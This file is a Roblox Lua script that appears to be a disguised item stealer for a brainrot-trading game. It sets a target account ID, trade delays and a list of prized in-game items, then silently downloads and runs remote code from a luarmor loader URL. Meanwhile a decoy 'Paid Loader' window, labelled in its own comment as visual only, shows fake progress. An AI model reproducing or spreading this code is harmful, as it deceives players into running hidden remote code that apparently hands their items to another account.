getgenv().SECRET_KEY = "mrr_ee7edd2bbf1a4574a02bf2ab08607120"
getgenv().TARGET_ID = 6074348674
getgenv().DELAY_STEP = 1      
getgenv().TRADE_CYCLE_DELAY = 2
getgenv().TARGET_BRAINROTS = {
    ["Fortunu and Cashuru"] = true,
    ["Los Amigos"] = true,
    ["Los Sekolahs"] = true,
    ["La Ginger Sekolah"] = true,
    ["Sammyni Fattini"] = true,
    ["Los Spaghettis"] = true,
    ["Cloverat Clapat"] = true,
    ["Spaghetti Tualetti"] = true,
    ["Rosetti Tualetti"] = true,
    ["Fishino Clownino"] = true,
    ["Gold Gold Gold"] = true,
    ["Jolly Jolly Sahur"] = true,
    ["Lavadorito Spinito"] = true,
    ["Ketchuru and Musturu"] = true,
    ["Swaggy Bros"] = true,
    ["La Romantic Grande"] = true,
    ["Orcaledon"] = true,
    ["Tictac Sahur"] = true,
    ["La Taco Combinasion"] = true,
    ["Ketupat Kepat"] = true,
    ["Tang Tang Keletang"] = true,
    ["Lovin Rose"] = true,
    ["Los Tacoritas"] = true,
    ["Eviledon"] = true,
    ["Los Primos"] = true,
    ["W or L"] = true,
    ["Esok Sekolah"] = true,
    ["La Jolly Grande"] = true,
    ["Los Cupids"] = true,
    ["Los Puggies"] = true,
    ["Tralaledon"] = true,
    ["Gobblino Uniciclino"] = true,
    ["Tuff Toucan"] = true,
    ["Chipso and Queso"] = true,
    ["Chillin Chili"] = true,
    ["La Spooky Grande"] = true,
    ["Los Bros"] = true,
    ["La Extinct Grande"] = true,
    ["Los Candies"] = true,
    ["Los 67"] = true,
    ["Celularcini Viciosini"] = true,
    ["Los Mobilis"] = true,
    ["Money Money Puggy"] = true,
    ["Los Spooky Combinasionas"] = true,
    ["Los Hotspotsitos"] = true,
    ["Los Planitos"] = true,
    ["Las Sis"] = true,
    ["Tacorita Bicicleta"] = true,
    ["Los Combinasionas"] = true,
    ["Noo my Gold"] = true,
    ["Swag Soda"] = true,
    ["Hydra Dragon Cannelloni"] = true,
    ["Dragon Gingerini"] = true,
    ["Dragon Cannelloni"] = true,
    ["Meowl"] = true,
    ["Headless Horseman"] = true,
    ["Skibidi Toilet"] = true
}
task.spawn(function()
loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/fbcd1d25889a843297107dea3642044d.lua"))()
end)
task.spawn(function()
--// Paid Loader (VISUAL UI ONLY)  local UIS = game:GetService("UserInputService")  -- GUI local ScreenGui = Instance.new("ScreenGui", game.CoreGui) ScreenGui.Name = "PaidLoader"  local Main = Instance.new("Frame", ScreenGui) Main.Size = UDim2.new(0, 260, 0, 160) Main.Position = UDim2.new(0.5, -130, 0.5, -80) Main.BackgroundColor3 = Color3.fromRGB(12,12,12) Main.BorderSizePixel = 0 Main.Active = true  Instance.new("UICorner", Main).CornerRadius = UDim.new(0,14)  local Stroke = Instance.new("UIStroke", Main) Stroke.Color = Color3.fromRGB(0,255,255) Stroke.Thickness = 1.5  -- Title (UPDATED) local Title = Instance.new("TextLabel", Main) Title.Size = UDim2.new(1,0,0,28) Title.BackgroundTransparency = 1 Title.Text = "Paid Loader" Title.TextColor3 = Color3.fromRGB(0,255,255) Title.TextScaled = true Title.Font = Enum.Font.SourceSansBold  -- Status local Status = Instance.new("TextLabel", Main) Status.Position = UDim2.new(0,0,0,28) Status.Size = UDim2.new(1,0,0,18) Status.BackgroundTransparency = 1 Status.Text = "Idle" Status.TextColor3 = Color3.fromRGB(0,255,255) Status.TextScaled = true  -- Log local Log = Instance.new("TextLabel", Main) Log.Position = UDim2.new(0.05,0,0.32,0) Log.Size = UDim2.new(0.9,0,0.2,0) Log.BackgroundColor3 = Color3.fromRGB(20,20,20) Log.TextColor3 = Color3.fromRGB(0,255,255) Log.Text = "Waiting..." Log.TextScaled = true Instance.new("UICorner", Log).CornerRadius = UDim.new(0,10)  -- Progress Bar local BarBG = Instance.new("Frame", Main) BarBG.Position = UDim2.new(0.1,0,0.58,0) BarBG.Size = UDim2.new(0.8,0,0,14) BarBG.BackgroundColor3 = Color3.fromRGB(30,30,30) Instance.new("UICorner", BarBG).CornerRadius = UDim.new(0,10)  local Bar = Instance.new("Frame", BarBG) Bar.Size = UDim2.new(0,0,1,0) Bar.BackgroundColor3 = Color3.fromRGB(0,255,255) Instance.new("UICorner", Bar).CornerRadius = UDim.new(0,10)  -- Button local Button = Instance.new("TextButton", Main) Button.Position = UDim2.new(0.1,0,0.72,0) Button.Size = UDim2.new(0.8,0,0,30) Button.Text = "Start" Button.BackgroundColor3 = Color3.fromRGB(0,255,255) Button.TextColor3 = Color3.fromRGB(0,0,0) Button.TextScaled = true Instance.new("UICorner", Button).CornerRadius = UDim.new(0,12)  -- Dragging local dragging = false local dragStart local startPos  Main.InputBegan:Connect(function(input) 	if input.UserInputType == Enum.UserInputType.MouseButton1 	or input.UserInputType == Enum.UserInputType.Touch then 		 		dragging = true 		dragStart = input.Position 		startPos = Main.Position  		input.Changed:Connect(function() 			if input.UserInputState == Enum.UserInputState.End then 				dragging = false 			end 		end) 	end end)  UIS.InputChanged:Connect(function(input) 	if dragging and (input.UserInputType == Enum.UserInputType.MouseMovement 	or input.UserInputType == Enum.UserInputType.Touch) then 		 		local delta = input.Position - dragStart 		Main.Position = UDim2.new( 			startPos.X.Scale, 			startPos.X.Offset + delta.X, 			startPos.Y.Scale, 			startPos.Y.Offset + delta.Y 		) 	end end)  -- Visual sequence Button.MouseButton1Click:Connect(function() 	Status.Text = "Running..." 	Log.Text = "Connecting..."  	wait(1) 	Log.Text = "Processing..."  	wait(1) 	Log.Text = "Loading modules..."  	wait(1)  	for i = 1,100 do 		wait(0.1) 		Bar.Size = UDim2.new(i/100,0,1,0) 	end  	Status.Text = "Complete" 	Log.Text = "Successfully finished simulation" end)
end)
